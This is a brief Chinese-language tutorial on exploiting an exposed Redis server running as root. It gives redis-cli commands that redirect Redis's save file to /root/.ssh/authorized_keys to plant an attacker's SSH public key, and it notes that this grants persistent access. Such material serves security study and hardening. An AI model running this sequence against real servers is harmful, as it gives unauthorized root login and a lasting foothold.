Redis漏洞利用

写 ssh-keygen 公钥登录服务器

  • 原理:

SSH提供两种登录验证方式,一种是口令验证也就是账号密码登录,另一种是密钥验证。

客户端生成私钥和公钥,并把公钥拷贝给服务器端 , 客户端收到服务器发来的加密后的消息后使用私钥解密,并把解密后的结果发给服务器用于验证

  • 利用条件:

1、Redis服务使用ROOT账号启动

2、服务器开放了SSH服务,而且允许使用密钥登录 -

  • 漏洞利用

根据原理,只要只要把自己公钥上传到服务端就可以

1
2
3
4
5
6
7
redis-cli -h 192.168.33.134        #连接目标主机redis
config get dir                  #检查当前保存路径
config get dbfilename              #检查保存文件名
config set dir /root/.ssh/         #设置保存路径
config set dbfilename authorized_keys #设置保存文件名
set xz "\n\n\n 公钥 \n\n\n"         #将公钥写入xz健
save                         #进行保存

可以用于维持权限

参考链接